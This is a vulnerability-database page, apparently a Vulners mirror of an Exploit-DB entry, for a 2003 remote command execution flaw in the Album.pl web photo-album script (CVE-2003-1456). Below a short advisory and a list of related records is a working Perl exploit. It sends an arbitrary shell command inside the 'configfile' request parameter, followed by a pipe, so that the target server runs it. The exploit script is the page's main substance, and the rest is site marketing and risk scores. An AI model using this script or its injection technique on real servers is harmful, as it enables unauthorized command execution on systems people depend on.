Lucene search
+L

Mike Bobbitt Album.PL 0.61 - Remote Command Execution

🗓️ 26 Apr 2003 00:00:00Reported by [email protected]Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Remote command execution vulnerability in Album.pl when using alternate configuration files.

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
album.pl < 6.2 Remote Command Execution
18 Aug 200400:00
nessus
nessus
Tenable Nessus
Mike Bobbitt's album.pl Alternative Configuration File Remote Command Execution
6 May 200300:00
nessus
cve
CVE
CVE-2003-1456
23 Oct 200701:00
cve
cvelist
Cvelist
CVE-2003-1456
23 Oct 200701:00
cvelist
euvd
EUVD
EUVD-2003-1446
7 Oct 202500:30
euvd
nvd
NVD
CVE-2003-1456
31 Dec 200305:00
nvd
source: https://www.securityfocus.com/bid/7444/info

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;

if (!$ARGV[0] && !$ARGV[1])
{
	print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
	exit;
}

$command="$ARGV[0]?configfile=$ARGV[1]|";

my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
	printf " %s\n", $result->status_line;
}
else
{
	print "Success: $result\n";
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Nov 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.03366
23